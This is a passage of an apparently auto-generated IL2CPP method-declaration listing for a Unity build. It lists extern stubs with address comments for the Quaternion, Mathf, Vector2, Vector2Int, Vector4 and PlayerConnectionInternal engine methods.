extern void Quaternion_GetHashCode_m5F55C34C98E437376595E722BE4EB8A70434F049 (void);
// 0x00000434 System.Boolean UnityEngine.Quaternion::Equals(System.Object)
extern void Quaternion_Equals_mCF93B00BA4FCDDE6100918451343DB9A0583A0A0 (void);
// 0x00000435 System.Boolean UnityEngine.Quaternion::Equals(UnityEngine.Quaternion)
extern void Quaternion_Equals_m25B95D8412B79CC7F8B34062BFAE662BD99578BE (void);
// 0x00000436 System.String UnityEngine.Quaternion::ToString()
extern void Quaternion_ToString_mC5BD5DEF60FCA4A38924462A5C4440ECFCF934C4 (void);
// 0x00000437 System.String UnityEngine.Quaternion::ToString(System.String)
extern void Quaternion_ToString_m57FD902CB5D5FDE30866C169033515B5330B3C5F (void);
// 0x00000438 System.String UnityEngine.Quaternion::ToString(System.String,System.IFormatProvider)
extern void Quaternion_ToString_m9B592D577B3FDB892CA53ABF3457BC2EDE45DF8C (void);
// 0x00000439 System.Void UnityEngine.Quaternion::.cctor()
extern void Quaternion__cctor_m0629AD915FB4AD74CBEE6788AA66DE91DBA2F8CB (void);
// 0x0000043A System.Void UnityEngine.Quaternion::FromToRotation_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Quaternion_FromToRotation_Injected_mEBE4E345974422E4906C862737C306068D68EFB1 (void);
// 0x0000043B System.Void UnityEngine.Quaternion::Inverse_Injected(UnityEngine.Quaternion&,UnityEngine.Quaternion&)
extern void Quaternion_Inverse_Injected_m6364007A516BE22DCDDE7006E7FF2766D9E548B6 (void);
// 0x0000043C System.Void UnityEngine.Quaternion::Slerp_Injected(UnityEngine.Quaternion&,UnityEngine.Quaternion&,System.Single,UnityEngine.Quaternion&)
extern void Quaternion_Slerp_Injected_m891D113D3FA964775E4259A784550F15BB78323B (void);
// 0x0000043D System.Void UnityEngine.Quaternion::SlerpUnclamped_Injected(UnityEngine.Quaternion&,UnityEngine.Quaternion&,System.Single,UnityEngine.Quaternion&)
extern void Quaternion_SlerpUnclamped_Injected_m0E2ECFB4264ED7FF75C648875E173FC2046CA74B (void);
// 0x0000043E System.Void UnityEngine.Quaternion::Internal_FromEulerRad_Injected(UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Quaternion_Internal_FromEulerRad_Injected_m175442AFC6D3B1E8B147793ACC2972D539224E77 (void);
// 0x0000043F System.Void UnityEngine.Quaternion::Internal_ToEulerRad_Injected(UnityEngine.Quaternion&,UnityEngine.Vector3&)
extern void Quaternion_Internal_ToEulerRad_Injected_m0A3D3DD2F0AF96455C082454169BF0CE21A60D06 (void);
// 0x00000440 System.Void UnityEngine.Quaternion::AngleAxis_Injected(System.Single,UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Quaternion_AngleAxis_Injected_m51E6538E88B6835838D157A2330346C520E414CB (void);
// 0x00000441 System.Void UnityEngine.Quaternion::LookRotation_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Quaternion_LookRotation_Injected_m5F814D23AEC43855A5B7D6792B5EE9637BA8CB19 (void);
// 0x00000442 System.Boolean UnityEngine.Mathf::IsPowerOfTwo(System.Int32)
extern void Mathf_IsPowerOfTwo_m76CE14ADD2BB5CF0E0E28F61826F19A7CAA015A3 (void);
// 0x00000443 System.Int32 UnityEngine.Mathf::NextPowerOfTwo(System.Int32)
extern void Mathf_NextPowerOfTwo_m25B17CBCFB02762842BE3725618DD97C7C4B1014 (void);
// 0x00000444 System.Single UnityEngine.Mathf::GammaToLinearSpace(System.Single)
extern void Mathf_GammaToLinearSpace_m4D758883DC92707BEB3D1774CE252B0233309DA6 (void);
// 0x00000445 System.Single UnityEngine.Mathf::PerlinNoise(System.Single,System.Single)
extern void Mathf_PerlinNoise_mFDD2B12BE1FE4E890FA9FCD5CE6D7A90CAA779D4 (void);
// 0x00000446 System.Single UnityEngine.Mathf::Sin(System.Single)
extern void Mathf_Sin_mDF1599028ED099FD561435ECA5D855D497D68522 (void);
// 0x00000447 System.Single UnityEngine.Mathf::Cos(System.Single)
extern void Mathf_Cos_m98106088477B4D2F109126476606618645FE0B4A (void);
// 0x00000448 System.Single UnityEngine.Mathf::Tan(System.Single)
extern void Mathf_Tan_mDA8A8AB9E7C34A9F71E665288DC91C02C6375974 (void);
// 0x00000449 System.Single UnityEngine.Mathf::Asin(System.Single)
extern void Mathf_Asin_mDB2B35EA988E8046B5DA225324D51AC54949DEB6 (void);
// 0x0000044A System.Single UnityEngine.Mathf::Acos(System.Single)
extern void Mathf_Acos_m31E645B707B2852DB9FACCD86126E3E72A344E28 (void);
// 0x0000044B System.Single UnityEngine.Mathf::Atan(System.Single)
extern void Mathf_Atan_mDF176C41BF5DB5837E937F994806E9BC66B44546 (void);
// 0x0000044C System.Single UnityEngine.Mathf::Atan2(System.Single,System.Single)
extern void Mathf_Atan2_m175B2856E832846B20DD2449F8A7FD56DFEC400E (void);
// 0x0000044D System.Single UnityEngine.Mathf::Sqrt(System.Single)
extern void Mathf_Sqrt_m3D6D010C2068F41874DAFCE488FFB775761B54D0 (void);
// 0x0000044E System.Single UnityEngine.Mathf::Abs(System.Single)
extern void Mathf_Abs_m3AB6ECAEF6C7FD03453C7A984B211EC9CBF99DEC (void);
// 0x0000044F System.Int32 UnityEngine.Mathf::Abs(System.Int32)
extern void Mathf_Abs_mEF48B2D15BEC6663A575693F563C6DC42C8135AE (void);
// 0x00000450 System.Single UnityEngine.Mathf::Min(System.Single,System.Single)
extern void Mathf_Min_m4F2A9C5128DC3F9E84865EE7ADA8DB5DA6B8B507 (void);
// 0x00000451 System.Int32 UnityEngine.Mathf::Min(System.Int32,System.Int32)
extern void Mathf_Min_mFEAD72DF4C4708B86BF464AB4F5F1468FAD8E784 (void);
// 0x00000452 System.Single UnityEngine.Mathf::Max(System.Single,System.Single)
extern void Mathf_Max_mA9DCA91E87D6D27034F56ABA52606A9090406016 (void);
// 0x00000453 System.Int32 UnityEngine.Mathf::Max(System.Int32,System.Int32)
extern void Mathf_Max_m8A4C189A6749DFE3ED8B66D9D3CACD8DB333974F (void);
// 0x00000454 System.Single UnityEngine.Mathf::Pow(System.Single,System.Single)
extern void Mathf_Pow_mA5253A5538FD900DFD781D297AC03A8E31561B03 (void);
// 0x00000455 System.Single UnityEngine.Mathf::Exp(System.Single)
extern void Mathf_Exp_m482F5D6CA3A7CFDD7FBACC95F9FE8A14310C61F2 (void);
// 0x00000456 System.Single UnityEngine.Mathf::Log(System.Single,System.Single)
extern void Mathf_Log_m5AD7CD5F4DCE823F0D89CFFD817934769D73B2B7 (void);
// 0x00000457 System.Single UnityEngine.Mathf::Log(System.Single)
extern void Mathf_Log_mC3436829A9ABA67272768EF5B1B6A94C1B41C804 (void);
// 0x00000458 System.Single UnityEngine.Mathf::Log10(System.Single)
extern void Mathf_Log10_mB0962ABE003B6F3C32D9F85F3F97D88D9A50E740 (void);
// 0x00000459 System.Single UnityEngine.Mathf::Ceil(System.Single)
extern void Mathf_Ceil_m2DD86C044E7CB46729630CD3C254EEBE4D3E0244 (void);
// 0x0000045A System.Single UnityEngine.Mathf::Floor(System.Single)
extern void Mathf_Floor_mFA10ED57F5D0C1E05F25868C8E99CE41D7C1A742 (void);
// 0x0000045B System.Single UnityEngine.Mathf::Round(System.Single)
extern void Mathf_Round_m2B4D74636DB0368F222D9BD6079343E1AFB3765D (void);
// 0x0000045C System.Int32 UnityEngine.Mathf::CeilToInt(System.Single)
extern void Mathf_CeilToInt_m04999E3DEB696135EFD620A30F51503D700C1998 (void);
// 0x0000045D System.Int32 UnityEngine.Mathf::FloorToInt(System.Single)
extern void Mathf_FloorToInt_mD086E41305DD8350180AD677833A22733B4789A9 (void);
// 0x0000045E System.Int32 UnityEngine.Mathf::RoundToInt(System.Single)
extern void Mathf_RoundToInt_m6A6E30BA4157D69DA47F02B43108882DDD7C4A70 (void);
// 0x0000045F System.Single UnityEngine.Mathf::Sign(System.Single)
extern void Mathf_Sign_m015249B312238B8DCA3493489FAFC3055E2FFEF8 (void);
// 0x00000460 System.Single UnityEngine.Mathf::Clamp(System.Single,System.Single,System.Single)
extern void Mathf_Clamp_m154E404AF275A3B2EC99ECAA3879B4CB9F0606DC (void);
// 0x00000461 System.Int32 UnityEngine.Mathf::Clamp(System.Int32,System.Int32,System.Int32)
extern void Mathf_Clamp_mA48718D9A20D8972EDD41714CEF6BBF864F442EA (void);
// 0x00000462 System.Single UnityEngine.Mathf::Clamp01(System.Single)
extern void Mathf_Clamp01_mD921B23F47F5347996C56DC789D1DE16EE27D9B1 (void);
// 0x00000463 System.Single UnityEngine.Mathf::Lerp(System.Single,System.Single,System.Single)
extern void Mathf_Lerp_mFB4910B358B986AFB22114ED90458E8341867479 (void);
// 0x00000464 System.Single UnityEngine.Mathf::LerpUnclamped(System.Single,System.Single,System.Single)
extern void Mathf_LerpUnclamped_mF5A9A9AC62D7BAD992CEAB2E5B6A49F5D2B87700 (void);
// 0x00000465 System.Single UnityEngine.Mathf::LerpAngle(System.Single,System.Single,System.Single)
extern void Mathf_LerpAngle_m1ED3F488EFE973020124E59B6B6D439D9ACCFA42 (void);
// 0x00000466 System.Boolean UnityEngine.Mathf::Approximately(System.Single,System.Single)
extern void Mathf_Approximately_m1C8DD0BB6A2D22A7DCF09AD7F8EE9ABD12D3F620 (void);
// 0x00000467 System.Single UnityEngine.Mathf::SmoothDamp(System.Single,System.Single,System.Single&,System.Single,System.Single,System.Single)
extern void Mathf_SmoothDamp_m00E482452BCED3FE0F16B4033B2B5323C7E30829 (void);
// 0x00000468 System.Single UnityEngine.Mathf::Repeat(System.Single,System.Single)
extern void Mathf_Repeat_m1ACDE7EF466FB6CCAD29B3866E4A239A8530E9D5 (void);
// 0x00000469 System.Single UnityEngine.Mathf::InverseLerp(System.Single,System.Single,System.Single)
extern void Mathf_InverseLerp_m4E1DA076090EC56955724109B3EE12AA07548016 (void);
// 0x0000046A System.Single UnityEngine.Mathf::DeltaAngle(System.Single,System.Single)
extern void Mathf_DeltaAngle_m4B87B84265A48389AC3F5E3E8164570C6AECE5C3 (void);
// 0x0000046B System.Void UnityEngine.Mathf::.cctor()
extern void Mathf__cctor_m2665985B855565B66529F63DA1E16CD47E22DB0E (void);
// 0x0000046C System.Single UnityEngine.Vector2::get_Item(System.Int32)
extern void Vector2_get_Item_m18BC65BB0512B16A1F9C8BE4B83A3E7BBAD7064D (void);
// 0x0000046D System.Void UnityEngine.Vector2::set_Item(System.Int32,System.Single)
extern void Vector2_set_Item_mEF309880B9B3B370B542AABEB32256EEC589DD03 (void);
// 0x0000046E System.Void UnityEngine.Vector2::.ctor(System.Single,System.Single)
extern void Vector2__ctor_m9525B79969AFFE3254B303A40997A56DEEB6F548 (void);
// 0x0000046F UnityEngine.Vector2 UnityEngine.Vector2::Lerp(UnityEngine.Vector2,UnityEngine.Vector2,System.Single)
extern void Vector2_Lerp_mF3BD6827807680A529E800FD027734D40A3597E1 (void);
// 0x00000470 UnityEngine.Vector2 UnityEngine.Vector2::LerpUnclamped(UnityEngine.Vector2,UnityEngine.Vector2,System.Single)
extern void Vector2_LerpUnclamped_mEC8F3EB7A6AA1B9C494701C993EA274838930F5A (void);
// 0x00000471 UnityEngine.Vector2 UnityEngine.Vector2::Scale(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Scale_mC9AFC562DF393640663C6FFC733EADD343FB6B65 (void);
// 0x00000472 System.Void UnityEngine.Vector2::Normalize()
extern void Vector2_Normalize_m56DABCAB5967DF37A6B96710477D3660D800C652 (void);
// 0x00000473 UnityEngine.Vector2 UnityEngine.Vector2::get_normalized()
extern void Vector2_get_normalized_mF6722883AEFB5027690A778DF8ACC20F0FA65297 (void);
// 0x00000474 System.String UnityEngine.Vector2::ToString()
extern void Vector2_ToString_mB47B29ECB21FA3A4ACEABEFA18077A5A6BBCCB27 (void);
// 0x00000475 System.String UnityEngine.Vector2::ToString(System.String)
extern void Vector2_ToString_m5F3C7B1C542DAF4CE90DDAB02A633AB0A3B08A05 (void);
// 0x00000476 System.String UnityEngine.Vector2::ToString(System.String,System.IFormatProvider)
extern void Vector2_ToString_mC10F098442E56919947154402A77EDE28DC9B7BE (void);
// 0x00000477 System.Int32 UnityEngine.Vector2::GetHashCode()
extern void Vector2_GetHashCode_mED8670C0E122B7ED0DAB4C3381ADFF04B75E0B03 (void);
// 0x00000478 System.Boolean UnityEngine.Vector2::Equals(System.Object)
extern void Vector2_Equals_mA4E81D6FCE503DBD502BA499708344410F60DA4E (void);
// 0x00000479 System.Boolean UnityEngine.Vector2::Equals(UnityEngine.Vector2)
extern void Vector2_Equals_mDF84D5ED14E018609C6A9C9BAE016C1B33BCFF4C (void);
// 0x0000047A System.Single UnityEngine.Vector2::Dot(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Dot_mBF0FA0B529C821F4733DDC3AD366B07CD27625F4 (void);
// 0x0000047B System.Single UnityEngine.Vector2::get_magnitude()
extern void Vector2_get_magnitude_m5C59B4056420AEFDB291AD0914A3F675330A75CE (void);
// 0x0000047C System.Single UnityEngine.Vector2::get_sqrMagnitude()
extern void Vector2_get_sqrMagnitude_mA16336720C14EEF8BA9B55AE33B98C9EE2082BDC (void);
// 0x0000047D System.Single UnityEngine.Vector2::Angle(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Angle_m9668B13074D1664DD192669C14B3A8FC01676299 (void);
// 0x0000047E System.Single UnityEngine.Vector2::Distance(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Distance_m220B2ADBE9F87426BEEE291263560DFE78F835B5 (void);
// 0x0000047F System.Single UnityEngine.Vector2::SqrMagnitude(UnityEngine.Vector2)
extern void Vector2_SqrMagnitude_m9020166A171C031DA7B163D3261C09EB7090F0AF (void);
// 0x00000480 UnityEngine.Vector2 UnityEngine.Vector2::Min(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Min_mAB64CD54A495856162FC5753B6C6B572AA4BEA1D (void);
// 0x00000481 UnityEngine.Vector2 UnityEngine.Vector2::Max(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_Max_m5FF3A49170F857E422CDD32A51CABEAE568E8088 (void);
// 0x00000482 UnityEngine.Vector2 UnityEngine.Vector2::op_Addition(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Addition_m704B5B98EAFE885978381E21B7F89D9DF83C2A60 (void);
// 0x00000483 UnityEngine.Vector2 UnityEngine.Vector2::op_Subtraction(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Subtraction_m664419831773D5BBF06D9DE4E515F6409B2F92B8 (void);
// 0x00000484 UnityEngine.Vector2 UnityEngine.Vector2::op_Multiply(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Multiply_m6158066AFB36810D63D98EABF0FABEFFC647B2A0 (void);
// 0x00000485 UnityEngine.Vector2 UnityEngine.Vector2::op_Division(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Division_mB1CA903ACF933DB0BE2016D105BB2B4702CF1004 (void);
// 0x00000486 UnityEngine.Vector2 UnityEngine.Vector2::op_UnaryNegation(UnityEngine.Vector2)
extern void Vector2_op_UnaryNegation_m47556D28F72B018AC4D5160710C83A805F10A783 (void);
// 0x00000487 UnityEngine.Vector2 UnityEngine.Vector2::op_Multiply(UnityEngine.Vector2,System.Single)
extern void Vector2_op_Multiply_m4EEB2FF3F4830390A53CE9B6076FB31801D65EED (void);
// 0x00000488 UnityEngine.Vector2 UnityEngine.Vector2::op_Multiply(System.Single,UnityEngine.Vector2)
extern void Vector2_op_Multiply_mB3B310D2D0CAE78AFB2AE6A9FD2902DE4B359211 (void);
// 0x00000489 UnityEngine.Vector2 UnityEngine.Vector2::op_Division(UnityEngine.Vector2,System.Single)
extern void Vector2_op_Division_m69F64D545E3C023BE9927397572349A569141EBA (void);
// 0x0000048A System.Boolean UnityEngine.Vector2::op_Equality(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Equality_m5447BF12C18339431AB8AF02FA463C543D88D463 (void);
// 0x0000048B System.Boolean UnityEngine.Vector2::op_Inequality(UnityEngine.Vector2,UnityEngine.Vector2)
extern void Vector2_op_Inequality_mCF3935E28AC7B30B279F07F9321CC56718E1311A (void);
// 0x0000048C UnityEngine.Vector2 UnityEngine.Vector2::op_Implicit(UnityEngine.Vector3)
extern void Vector2_op_Implicit_m8F73B300CB4E6F9B4EB5FB6130363D76CEAA230B (void);
// 0x0000048D UnityEngine.Vector3 UnityEngine.Vector2::op_Implicit(UnityEngine.Vector2)
extern void Vector2_op_Implicit_mCD214B04BC52AED3C89C3BEF664B6247E5F8954A (void);
// 0x0000048E UnityEngine.Vector2 UnityEngine.Vector2::get_zero()
extern void Vector2_get_zero_m009B92B5D35AB02BD1610C2E1ACCE7C9CF964A6E (void);
// 0x0000048F UnityEngine.Vector2 UnityEngine.Vector2::get_one()
extern void Vector2_get_one_m232E885D3C7BB6A96D5FEF4494709BA170447604 (void);
// 0x00000490 UnityEngine.Vector2 UnityEngine.Vector2::get_up()
extern void Vector2_get_up_mF4D6DB00DEA7D055940165B85FFE1CEF6F7CD3AA (void);
// 0x00000491 UnityEngine.Vector2 UnityEngine.Vector2::get_down()
extern void Vector2_get_down_m744DCF40A3F17B76B9C084145D6E66AC0DE3D5CD (void);
// 0x00000492 UnityEngine.Vector2 UnityEngine.Vector2::get_right()
extern void Vector2_get_right_mCE2D0142663361ED4B48C36873786986D25A6E0A (void);
// 0x00000493 UnityEngine.Vector2 UnityEngine.Vector2::get_positiveInfinity()
extern void Vector2_get_positiveInfinity_m03B87ABC38ACBE2160599734C319DD1BA1064B5F (void);
// 0x00000494 System.Void UnityEngine.Vector2::.cctor()
extern void Vector2__cctor_m36CE8EBCD8DDF8D15B8AD39C675A117DC338510A (void);
// 0x00000495 System.Int32 UnityEngine.Vector2Int::get_x()
extern void Vector2Int_get_x_mA2CACB1B6E6B5AD0CCC32B2CD2EDCE3ECEB50576 (void);
// 0x00000496 System.Void UnityEngine.Vector2Int::set_x(System.Int32)
extern void Vector2Int_set_x_m291ECF246536852F0B8EE049C4A3768E4999CDC8 (void);
// 0x00000497 System.Int32 UnityEngine.Vector2Int::get_y()
extern void Vector2Int_get_y_m48454163ECF0B463FB5A16A0C4FC4B14DB0768B3 (void);
// 0x00000498 System.Void UnityEngine.Vector2Int::set_y(System.Int32)
extern void Vector2Int_set_y_mF81881204EEE272BA409728C7EBFDE3A979DDF6A (void);
// 0x00000499 System.Void UnityEngine.Vector2Int::.ctor(System.Int32,System.Int32)
extern void Vector2Int__ctor_mC20D1312133EB8CB63EC11067088B043660F11CE (void);
// 0x0000049A UnityEngine.Vector2 UnityEngine.Vector2Int::op_Implicit(UnityEngine.Vector2Int)
extern void Vector2Int_op_Implicit_m0D3B1D66E99D4C636F431691169479582058BED3 (void);
// 0x0000049B System.Boolean UnityEngine.Vector2Int::op_Equality(UnityEngine.Vector2Int,UnityEngine.Vector2Int)
extern void Vector2Int_op_Equality_m0BACF220C29A50100740A626E2A928F9F96E6759 (void);
// 0x0000049C System.Boolean UnityEngine.Vector2Int::Equals(System.Object)
extern void Vector2Int_Equals_m6D91EFAA6B3254334436BD262A4547EA08281BA3 (void);
// 0x0000049D System.Boolean UnityEngine.Vector2Int::Equals(UnityEngine.Vector2Int)
extern void Vector2Int_Equals_m32811BA0576C096D5EB5C0CFD8231478F17229A6 (void);
// 0x0000049E System.Int32 UnityEngine.Vector2Int::GetHashCode()
extern void Vector2Int_GetHashCode_mA3B6135FA770AF0C171319B50D9B913657230EB7 (void);
// 0x0000049F System.String UnityEngine.Vector2Int::ToString()
extern void Vector2Int_ToString_m6F7E9B9B45A473FED501EB8B8B25BA1FE26DD5D4 (void);
// 0x000004A0 System.String UnityEngine.Vector2Int::ToString(System.String,System.IFormatProvider)
extern void Vector2Int_ToString_m44BA6941AEF41076A39848B95DDEFEA88A094B5E (void);
// 0x000004A1 System.Void UnityEngine.Vector2Int::.cctor()
extern void Vector2Int__cctor_mBDFABDF36D93E0928973998555369F69ED7D165B (void);
// 0x000004A2 System.Single UnityEngine.Vector4::get_Item(System.Int32)
extern void Vector4_get_Item_mB1D001A235857569E479FB799EF77C52391D19EF (void);
// 0x000004A3 System.Void UnityEngine.Vector4::set_Item(System.Int32,System.Single)
extern void Vector4_set_Item_mF24782F861A16BB0436C2262FA916B4EE69998A6 (void);
// 0x000004A4 System.Void UnityEngine.Vector4::.ctor(System.Single,System.Single,System.Single,System.Single)
extern void Vector4__ctor_m96B2CD8B862B271F513AF0BDC2EABD58E4DBC813 (void);
// 0x000004A5 UnityEngine.Vector4 UnityEngine.Vector4::Lerp(UnityEngine.Vector4,UnityEngine.Vector4,System.Single)
extern void Vector4_Lerp_m6503F684342826D70038B2D13DEE7BD56EC1C88C (void);
// 0x000004A6 System.Int32 UnityEngine.Vector4::GetHashCode()
extern void Vector4_GetHashCode_m53F6FCA56A0051C9D1AB41AA3EAA2C86CDAA8B92 (void);
// 0x000004A7 System.Boolean UnityEngine.Vector4::Equals(System.Object)
extern void Vector4_Equals_mC2596CA0F441D25DE7A9419BE66A8FA2DA355CB9 (void);
// 0x000004A8 System.Boolean UnityEngine.Vector4::Equals(UnityEngine.Vector4)
extern void Vector4_Equals_m73FAA65A1A565EE28D6C9385603829894B7D4392 (void);
// 0x000004A9 UnityEngine.Vector4 UnityEngine.Vector4::Normalize(UnityEngine.Vector4)
extern void Vector4_Normalize_m8F4DF140B072B7EC3D03F05AC1EDFB270579A8D2 (void);
// 0x000004AA UnityEngine.Vector4 UnityEngine.Vector4::get_normalized()
extern void Vector4_get_normalized_mD7671F6DCE4C1A80243139B87858FF65F4B865A3 (void);
// 0x000004AB System.Single UnityEngine.Vector4::Dot(UnityEngine.Vector4,UnityEngine.Vector4)
extern void Vector4_Dot_m77027F378A20620C9F2AC80A06191C412B76FD2E (void);
// 0x000004AC System.Single UnityEngine.Vector4::Magnitude(UnityEngine.Vector4)
extern void Vector4_Magnitude_mCCDF8803AFB8B4B52D259376C9CD49F065FF0F42 (void);
// 0x000004AD System.Single UnityEngine.Vector4::get_magnitude()
extern void Vector4_get_magnitude_m97A83FC484190F07D8017F4BD10E3C81478E0D20 (void);
// 0x000004AE System.Single UnityEngine.Vector4::get_sqrMagnitude()
extern void Vector4_get_sqrMagnitude_m864A2908BCF9E060BA73DE3DD259EC06F47F913C (void);
// 0x000004AF UnityEngine.Vector4 UnityEngine.Vector4::get_zero()
extern void Vector4_get_zero_m51B18794FAF141EBD06CA9907E6F7DF9D60F3515 (void);
// 0x000004B0 UnityEngine.Vector4 UnityEngine.Vector4::get_one()
extern void Vector4_get_one_m141F5123C4052CC703B41E5892A4AC26C59D36EE (void);
// 0x000004B1 UnityEngine.Vector4 UnityEngine.Vector4::op_Addition(UnityEngine.Vector4,UnityEngine.Vector4)
extern void Vector4_op_Addition_m5E7015CDA7DD1FCB4E488DE23C5DB959D7406843 (void);
// 0x000004B2 UnityEngine.Vector4 UnityEngine.Vector4::op_Multiply(UnityEngine.Vector4,System.Single)
extern void Vector4_op_Multiply_m10DA1FA6A405C8988C46FFD159ED9FF9E5D732F5 (void);
// 0x000004B3 UnityEngine.Vector4 UnityEngine.Vector4::op_Division(UnityEngine.Vector4,System.Single)
extern void Vector4_op_Division_mBBF62E1EDEB882858589FCF7280591FD11CD660C (void);
// 0x000004B4 System.Boolean UnityEngine.Vector4::op_Equality(UnityEngine.Vector4,UnityEngine.Vector4)
extern void Vector4_op_Equality_m80E2AA0626A70EF9DCC4F4C215F674A22D6DE937 (void);
// 0x000004B5 System.Boolean UnityEngine.Vector4::op_Inequality(UnityEngine.Vector4,UnityEngine.Vector4)
extern void Vector4_op_Inequality_m23600308603A706A9DD6057603DEA82E9A6F9FEF (void);
// 0x000004B6 UnityEngine.Vector4 UnityEngine.Vector4::op_Implicit(UnityEngine.Vector3)
extern void Vector4_op_Implicit_mB05287DC52FC87A756AB80E837E1EC22FEEB3937 (void);
// 0x000004B7 UnityEngine.Vector3 UnityEngine.Vector4::op_Implicit(UnityEngine.Vector4)
extern void Vector4_op_Implicit_m2EC16C74D768EEAA9BBC40DA11337F912014FC57 (void);
// 0x000004B8 UnityEngine.Vector4 UnityEngine.Vector4::op_Implicit(UnityEngine.Vector2)
extern void Vector4_op_Implicit_m6162D8136CFE97A5A8BD3B764F9074DB96AA5CD0 (void);
// 0x000004B9 System.String UnityEngine.Vector4::ToString()
extern void Vector4_ToString_mFA0DDF34C1E394F75EF65E06764A1BE750E7F388 (void);
// 0x000004BA System.String UnityEngine.Vector4::ToString(System.String,System.IFormatProvider)
extern void Vector4_ToString_m2BE67BEBBD3059C9CEE29BF34AD30E1D7057E914 (void);
// 0x000004BB System.Void UnityEngine.Vector4::.cctor()
extern void Vector4__cctor_m901E65EFB13CFC002E6DF21A8071FB7C7008CCC4 (void);
// 0x000004BC System.Void UnityEngine.IPlayerEditorConnectionNative::Initialize()
// 0x000004BD System.Void UnityEngine.IPlayerEditorConnectionNative::DisconnectAll()
// 0x000004BE System.Void UnityEngine.IPlayerEditorConnectionNative::SendMessage(System.Guid,System.Byte[],System.Int32)
// 0x000004BF System.Boolean UnityEngine.IPlayerEditorConnectionNative::TrySendMessage(System.Guid,System.Byte[],System.Int32)
// 0x000004C0 System.Void UnityEngine.IPlayerEditorConnectionNative::Poll()
// 0x000004C1 System.Void UnityEngine.IPlayerEditorConnectionNative::RegisterInternal(System.Guid)
// 0x000004C2 System.Void UnityEngine.IPlayerEditorConnectionNative::UnregisterInternal(System.Guid)
// 0x000004C3 System.Boolean UnityEngine.IPlayerEditorConnectionNative::IsConnected()
// 0x000004C4 System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.SendMessage(System.Guid,System.Byte[],System.Int32)
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_SendMessage_m561CA89041EBAFF52314B0D35F7335AF03690EE2 (void);
// 0x000004C5 System.Boolean UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.TrySendMessage(System.Guid,System.Byte[],System.Int32)
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_TrySendMessage_mD5B897823668810AC92B7A4DB37D2AC469B5AD92 (void);
// 0x000004C6 System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.Poll()
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_Poll_m81154E92307248D79B91A1C1EA75BEF458573D02 (void);
// 0x000004C7 System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.RegisterInternal(System.Guid)
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_RegisterInternal_m75ADFE89F806D7CCDA39F4BEB6E13F98789EC3A4 (void);
// 0x000004C8 System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.UnregisterInternal(System.Guid)
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_UnregisterInternal_m52F310CFE97694C751D5B1FEC47D42C544CB221B (void);
// 0x000004C9 System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.Initialize()
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_Initialize_m2DF230DCAD67005FD0517D836520E73944A6CF71 (void);
// 0x000004CA System.Boolean UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.IsConnected()
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_IsConnected_m6C83428E73F46078BA1407A17A69702BC8F34956 (void);
// 0x000004CB System.Void UnityEngine.PlayerConnectionInternal::UnityEngine.IPlayerEditorConnectionNative.DisconnectAll()
extern void PlayerConnectionInternal_UnityEngine_IPlayerEditorConnectionNative_DisconnectAll_m6143241C82774D473C8979A05BE0CE3ADAF37F98 (void);
// 0x000004CC System.Boolean UnityEngine.PlayerConnectionInternal::IsConnected()
extern void PlayerConnectionInternal_IsConnected_mC70EEB4A36D9B1ECF154FE2CB74370E24E0053A1 (void);
// 0x000004CD System.Void UnityEngine.PlayerConnectionInternal::Initialize()
extern void PlayerConnectionInternal_Initialize_m6C024134BBFE135A15CDD4BADF7FDF21D21D3171 (void);
// 0x000004CE System.Void UnityEngine.PlayerConnectionInternal::RegisterInternal(System.String)
extern void PlayerConnectionInternal_RegisterInternal_mAEDF69DF2114104B7BCBD5DC995C156D18BC334F (void);
// 0x000004CF System.Void UnityEngine.PlayerConnectionInternal::UnregisterInternal(System.String)
extern void PlayerConnectionInternal_UnregisterInternal_mB9CC98CAC75430D329D191A9FBB5BD1930AF5C35 (void);
// 0x000004D0 System.Void UnityEngine.PlayerConnectionInternal::SendMessage(System.String,System.Byte[],System.Int32)
extern void PlayerConnectionInternal_SendMessage_m023CC363EF369965FAD8ECC0E17D1219CE4FED23 (void);
// 0x000004D1 System.Boolean UnityEngine.PlayerConnectionInternal::TrySendMessage(System.String,System.Byte[],System.Int32)
extern void PlayerConnectionInternal_TrySendMessage_m624CB64545D94A3CA26D1B7724CEF0A4DE62AC52 (void);
// 0x000004D2 System.Void UnityEngine.PlayerConnectionInternal::PollInternal()
extern void PlayerConnectionInternal_PollInternal_m1BFF0824FA228EACA54B25A5ED6C118D3B45E0AC (void);
// 0x000004D3 System.Void UnityEngine.PlayerConnectionInternal::DisconnectAll()
extern void PlayerConnectionInternal_DisconnectAll_m829AFC50AB1C38E8B429FBD35DA082D1D21524F8 (void);
// 0x000004D4 System.Void UnityEngine.PlayerConnectionInternal::.ctor()
